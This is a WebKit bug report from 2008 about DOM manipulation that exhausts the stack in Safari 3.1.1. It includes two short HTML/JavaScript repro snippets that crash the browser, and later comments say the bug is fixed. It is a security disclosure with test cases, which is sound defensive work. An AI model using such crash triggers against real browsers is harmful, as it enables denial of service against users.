RESOLVED FIXED 19514
DOM modification causes stack exhaustion (exact cause unknown) 
https://bugs.webkit.org/show_bug.cgi?id=19514
Summary DOM modification causes stack exhaustion (exact cause unknown)
Berend-Jan Wever
Reported 2008-06-12 04:16:13 PDT
I found that the following javascript causes a stack exhaustion: <BODY onload="go()"><SCRIPT> function go() { var oEmbed=document.createElement('embed'); document.body.appendChild(oEmbed); var oEmbed2 = oEmbed.cloneNode(); oEmbed2.appendChild(document.body.parentElement); var oA = document.createElement('a'); document.title = ''; oA.innerHTML = '<x><html></html>'; } </SCRIPT></BODY> Tested with Safari 3.1.1. Marked as security, I'm not sure if you treat DoS as a security issue, so erring on the safe side.
Attachments
Add attachment proposed patch, testcase, etc.
Berend-Jan Wever
Comment 1 2008-06-12 04:22:27 PDT
(In reply to comment #0) OOOPS. I copy+pasted the wrong code (see bug 19516). This is the real repro code for this case: <BODY onload="go()"><SCRIPT> function go() { oStrike=document.createElement('b'); oStrike.innerHTML='<object><table></table><colGroup></colGroup></object>'; document.body.parentElement.appendChild(oStrike); } </SCRIPT></BODY>
Berend-Jan Wever
Comment 2 2008-06-13 06:29:01 PDT
Changing priority and security flag
Mark Rowe (bdash)
Comment 3 2008-06-13 14:52:30 PDT
<rdar://problem/6007109>
mitz
Comment 4 2008-07-05 01:29:12 PDT
I cannot reproduce in r35011. I think this bug was fixed along with bug 15919 in <http://trac.webkit.org/changeset/34692>.
Note You need to log in before you can comment on or make changes to this bug.